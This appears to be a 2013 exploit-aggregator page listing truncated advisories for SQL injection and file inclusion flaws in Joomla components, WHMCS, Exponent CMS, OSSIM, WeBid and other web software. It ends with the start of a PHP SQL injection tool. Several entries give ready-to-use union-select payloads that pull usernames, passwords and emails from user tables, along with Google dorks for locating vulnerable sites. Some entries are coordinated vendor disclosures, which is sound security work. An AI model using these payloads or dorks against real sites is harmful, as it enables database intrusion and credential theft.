Joomla Discussions SQL Injection

17 May 2013 - Source: http://www.mondounix.com
# Title     : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability
# Author    : Red Security TEAM
# Date      : 17/01/2012
# Risk      : High
# Software  : http://extensions.joomla.org/extensions/communication/forum/13560
# Tested On : CentOS
# Contact   : Info [ 4t ] RedSecurity [ d0t ] COM
# Home      : http://RedSecurity.COM
#
# Exploit   :
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=[SQLi]
#
# Example   : 
#
# 1. [Get Database Name]
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)--+a
# 2. [Get  Tables  Name]
#...


Joomla Component com_s5clanroster Sql Injection Vulnerability

17 May 2013 - Source: http://www.mondounix.com
Joomla Component com_s5clanroster Sql Injection Vulnerability
==============================================================
 
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Dork           : inurl:"com_s5clanroster"
.:. Script         : http://www.newone.org/s5-clan-roster-shape5-extensions
####################################################################
===[ Exploit ]===
 
Sql Injection:
==============
 
www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql]
 
www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null'+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users--...


Exponent CMS 2.2.0 Beta 3 LFI / SQL Injection

16 May 2013 - Source: http://www.mondounix.com
Advisory ID: HTB23154
Product: Exponent CMS
Vendor: Online Innovative Creations
Vulnerable Version(s): 2.2.0 beta 3 and probably prior
Tested Version: 2.2.0 beta 3
Vendor Notification: April 24, 2013 
Vendor Patch: May 3, 2013 
Public Disclosure: May 15, 2013 
Vulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98]
CVE References: CVE-2013-3294, CVE-2013-3295
Risk Level: High 
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory...


WHMCS 4.5.2 SQL Injection

14 May 2013 - Source: http://www.mondounix.com
# Title: WHMCS 4.x SQL Injection Vulnerability 
# Google Dork: intext:"Powered by WHMCompleteSolution" OR inurl:"submitticket.php"
# Author: Ahmed Aboul-Ela
# Contact: Ahmed.Aboul3la[at]gmail[dot]com
# Date: 14/5/2013
# Vendor: http://www.whmcs.com
# Version: 4.5.2 and prior versions should be affected too
# Tested on: Linux
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Sql Injection Vulnerability in "/includes/invoicefunctions.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
    - Vulnerable Code Snippet :
 
      LINE 582: function pdfInvoice($id)
      LINE 583: {
      LINE 686: if ($CONFIG['GroupSimilarLineItems'])
...


AlienVault OSSIM multiple SQL Injection vulnerabilities

9 May 2013 - Source: http://www.mondounix.com
RunRunLevel Web Security Research - AlienVault OSSIM multiple SQL Injection vulnerabilities
Vendor Website : http://www.alienvault.com
 
 INDEX
---------------------------------------
    1. Background
    2. Description
    3. Affected Products
    4. Vulnerabilities
    5. Solution
    6. Credit
    7. Disclosure Timeline
 
 
1. BACKGROUND
---------------------------------------
    OSSIM by AlienVault is an Open Source Security Information and Event Management (SIEM) platform, comprising a
collection of tools designed to aid network administrators in computer security, intrusion detection and prevention.
(Wikipedia)
 
 
2. DESCRIPTION
---------------------------------------
    The RunRunLevel Web...


Joomla DJ Classifieds Extension 2.0 SQL Injection

9 May 2013 - Source: http://www.mondounix.com
# Exploit Title: Joomla - DJ Classifieds - Time-Based Blind SQL Injection
# Google Dork: inurl:"index.php/dj-classifieds/" or inurl:"/dj-classifieds/"
# Date: 4/5/2013
# Exploit Author: Napsterakos
# Vendor Homepage: http://design-joomla.eu
# Software Link: -
# Version: 2.0
# Tested on: Linux
 
 
Link: http://server/joomla/index.php/dj-classifieds/
 
Exploit: http://server/joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=[SQLi]
 
# Exploit-DB Note:
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=0
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=1
 
Credits to: Greek Hacking Scene
...


Craigslist Gold SQL Injection

9 May 2013 - Source: http://www.mondounix.com
# Exploit Title: Craigslist Clone Gold SQL injection Vulnerability
# Date: 04/05/2013
# Author: Fallaga
# Team: FaLLaGa Tunisian Hackers
#Script url: http://www.scriptcopy.com/craigslist-clone-script/Craiglist-Gold-4444.html
# Version: N/A
# Tested on: Demo
# CVE : ()
############################################################
#######################
 
 
 
#########################[ EXPL0!T ]#########################
 
 
http://exemple/classifieds2/?view=ads&catid=-1+union+select+concat(email,0x3a,code)+from+clf_ads--
 
 
 
#############################SwT 4 Ever##########################
####################
 
 
@JaMbA !!  GreeTz: Fallaga Team + all tunisian people
...


Webid 1.0.6 File Disclosure / SQL Injection

9 May 2013 - Source: http://www.mondounix.com
# Title: Webid Blind SQL Injection / Local File Disclosure Vulnerability 
# Google Dork: intext:"Powered by WeBid"
# Author: Ahmed Aboul-Ela
# Contact: Ahmed.Aboul3la[at]gmail[dot]com
# Vendor: http://www.webidsupport.com/
# Software Link: http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.0.6/WeBid-1.0.6.zip/download
# Version: 1.0.6 (current latest release) and prior versions should be affected too 
# Tested on: Linux
 
- About the Software: 
 
  WeBid is an open-source auction script package.
  Although still in beta stages WeBid is one of the best open-source solutions for getting an auction site up and running quickly and cheaply.
  Written in the popular scripting language PHP and...


Speck CMS SQL Injection

4 May 2013 - Source: http://www.mondounix.com
Author: Jason Whelan
PacketStorm: exploitdev
Email: exploitdevj@gmail.com
 
Target Software: Speck CMS Framework, Latest
Vendor URL: http://www.speckcms.org/
 
Multiple SQL Injection Vulnerabilities
 
Examples:
 
portal/user.cfm:
<cfquery name="qUser" datasource="#request.speck.codb#">
        SELECT * FROM spUsers WHERE username = '#url.username#'
</cfquery>
 
portal/group.cfm:
<cfquery name="qGroup" datasource="#request.speck.codb#">
        SELECT * FROM spGroups WHERE groupname = '#url.groupname#'
</cfquery>
 
 
Many more exist in this CMS framework. Exploitation will depend on the use
of these files within the user's CMS.
...


Multithreaded SQL Injector

2 May 2013 - Source: http://www.mondounix.com
<?php
/*************************************************************************
                . __                      .__                          
           _____ |__|___.__._____    ____ |  |__  __ __  ____    ____  
          /     \|  <   |  |\__  \ _/ ___\|  |  \|  |  \/    \  / ___\ 
         |  Y Y  \  |\___  | / __ \\  \___|   Y  \  |  /   |  \/ /_/  >
         |__|_|  /__|/ ____|(____  /\___  >___|  /____/|___|  /\___  / 
               \/    \/          \/     \/     \/           \//_____/  
--------------------------------------------------------------------------
*     Multithreaded SQL Injector
*     Coded by Miyachung
*     Miyachung@hotmail.com
*     Special Thanks burtay
*     Janissaries.Org
*...
